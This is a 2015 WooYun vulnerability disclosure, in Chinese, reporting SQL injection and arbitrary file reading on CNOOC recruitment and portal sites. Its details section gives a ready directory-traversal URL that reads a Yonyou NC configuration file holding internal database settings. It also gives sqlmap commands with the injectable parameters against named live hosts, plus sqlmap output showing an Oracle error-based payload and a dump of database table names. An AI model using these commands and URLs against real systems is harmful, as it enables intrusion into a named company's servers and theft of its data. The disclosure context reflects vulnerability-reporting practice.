当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117834

漏洞标题:中国海洋石油某站多个漏洞打包(SQL注入&文件读取等)

相关厂商:中国海洋石油总公司

漏洞作者: 路人甲

提交时间:2015-06-03 09:26

修复时间:2015-06-08 09:28

公开时间:2015-06-08 09:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中海油多处sql注射及任意文件读取

详细说明:

1.zhaopin.cnooc.com.cn
用友nc任意文件读取:

http://zhaopin.cnooc.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml


http://zhaopin.cnooc.com.cn:90/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml


内网数据库配置泄露
sql注入:

sqlmap.py -u "http://zhaopin.cnooc.com.cn/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null" -p pkAttach --random-agent


sqlmap.py -u "http://zhaopin.cnooc.com.cn/hrss/ref.show.d?refcode=HI000000000000000003" -p refcode--random-agent


另外,该网站还有许多其他的用友系统的通用注入,太多了就不贴了。
2.ee.cnooc.com.cn(ps:早上还不需要注册,但是下午一看就需要注册了,应该只有登录后才能注入,又只允许内部人员注册,所以可以忽略吧,没想到居然这么有意识,下次下手得快)

sqlmap.py -u "http://ee.cnooc.com.cn/portal.php?catid=128&mod=list" -p catid --random-agent


附图:

QQ图片20150602090955.png

漏洞证明:

QQ图片20150602205330.png


QQ图片20150602204702.png


--
Parameter: pkAttach (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: appName=PSNBASDOC_RM&pkAttach=null' AND 8166=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8166=8166) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'YYvM'='YYvM
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYS
[334 tables]
+-----------------------------------------------+
| %255FDEFAULT%255FAUDITING%255FOPTIONS%255F |
| APPLY$%255FCHANGE%255FHANDLERS |
| APPLY$%255FCONF%255FHDLR%255FCOLUMNS |
| APPLY$%255FCONSTRAINT%255FCOLUMNS |
| APPLY$%255FDEST%255FOBJ |
| APPLY$%255FDEST%255FOBJ%255FCMAP |
| APPLY$%255FDEST%255FOBJ%255FOPS |
| APPLY$%255FERROR |
| APPLY$%255FERROR%255FHANDLER |
| APPLY$%255FERROR%255FTXN |
| APPLY$%255FSOURCE%255FOBJ |
| APPLY$%255FSOURCE%255FSCHEMA |
| APPLY$%255FVIRTUAL%255FOBJ%255FCONS |
| AUX%255FSTATS$ |
| AW%255FOBJ$ |
| AW%255FPRG$ |
| AW%255FPROP$ |
| AW%255FTRACK$ |
| CACHE%255FSTATS%255F0$ |
| CACHE%255FSTATS%255F1$ |
| CDC%255FCHANGE%255FCOLUMNS$ |
| CDC%255FCHANGE%255FSETS$ |
| CDC%255FCHANGE%255FSOURCES$ |

修复方案:

zhaopin还是找用友吧,ee分站也要过滤一下

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-08 09:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无